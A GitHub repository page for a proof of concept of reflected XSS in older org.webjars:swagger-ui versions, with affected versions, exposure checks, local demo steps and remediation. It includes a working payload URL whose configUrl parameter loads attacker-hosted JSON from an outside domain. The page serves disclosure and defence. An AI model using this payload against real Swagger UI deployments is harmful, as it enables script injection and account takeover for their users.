Skip to content

seanmarpo/webjars-swagger-xss

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

src

src

 
 

.gitignore

.gitignore

 
 

Dockerfile

Dockerfile

 
 

README.md

README.md

 
 

build.gradle

build.gradle

 
 

build_and_run.sh

build_and_run.sh

 
 

gradle.properties

gradle.properties

 
 

gradlew

gradlew

 
 

gradlew.bat

gradlew.bat

 
 

settings.gradle

settings.gradle

 
 

Repository files navigation

WebJars Swagger XSS PoC

Credit and Thanks

Example application was copied from: https://github.com/http4k/examples/tree/master/hello-world

Credit to the http4k team for maintaining simple, easy-to-use docs on setting up a quick web app to show off webjars.

Quick Details

Package: org.webjars:swagger-ui

Versions Affected: [3.14.2, 3.36.2]

Type of Issue: Reflected XSS

Payload/PoC: ?configUrl=https://xss.smarpo.com/test.json -- Append this to end of the Swagger UI URL and an alert dialog should fire.

  • eg. https://example.com/webjars/swagger-ui/3.14.2/index.html?configUrl=https://xss.smarpo.com/test.json

Am I vulnerable?

If your application includes the org.webjars:swagger-ui package within the stated vulnerable versions AND you make the Swagger UI "routable" (aka, it can be loaded in a browser), your application has an XSS issue.

For example, if your app includes org.webjars:swagger-ui:3.36.2 and your Swagger UI is available at https://localhost/swagger -- you are vulnerable.

For example, if your app includes org.webjars:swagger-ui:3.17.6 and your Swagger UI is available at: https://example.com/swagger/swagger-ui -- you are vulnerable.

About

The Swagger UI is commonly included in applications to allow for visually viewing a service's OpenAPI API documentation via a convenient web-interface. Older versions of the Swagger UI suffer from known XSS issues. WebJars merely serve as a way to package up common frontend code and provide it as a clean JVM-based dependency to avoid needing to manage frontend dependency management on top of backend dependencies.

This particular vulnerability was originally found and described by: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

Running the PoC

You will need JDK 11 and Docker available for easiest running of PoC.

With docker

  1. Run: docker build -t webjars-xss .
  2. Run: docker run -p 8080:8080 webjars-xss
  3. Navigate to: http://localhost:8080/webjars/swagger-ui/3.36.2/index.html?configUrl=https://xss.smarpo.com/test.json

Without docker

  1. Run: ./gradlew clean distZip
  2. Run: unzip build/distributions/Example.zip
  3. Run: ./Example/bin/Example
  4. Navigate to: http://localhost:8080/webjars/swagger-ui/3.36.2/index.html?configUrl=https://xss.smarpo.com/test.json

XSS Payloads are hosted at: seanmarpo/swagger-xss-payloads

Remediation

  • Update org.webjars:swagger-ui to a version higher than 3.36.2
  • Remove routing for the swagger-ui webjars such that they are not available for web access

About

PoC for XSS in org.webjars:swagger-ui [3.14.2, 3.36.2]

Topics

xss xss-vulnerability xss-poc

Resources

Readme
Activity

Stars

48 stars

Watchers

2 watching

Forks

9 forks
Report repository

Languages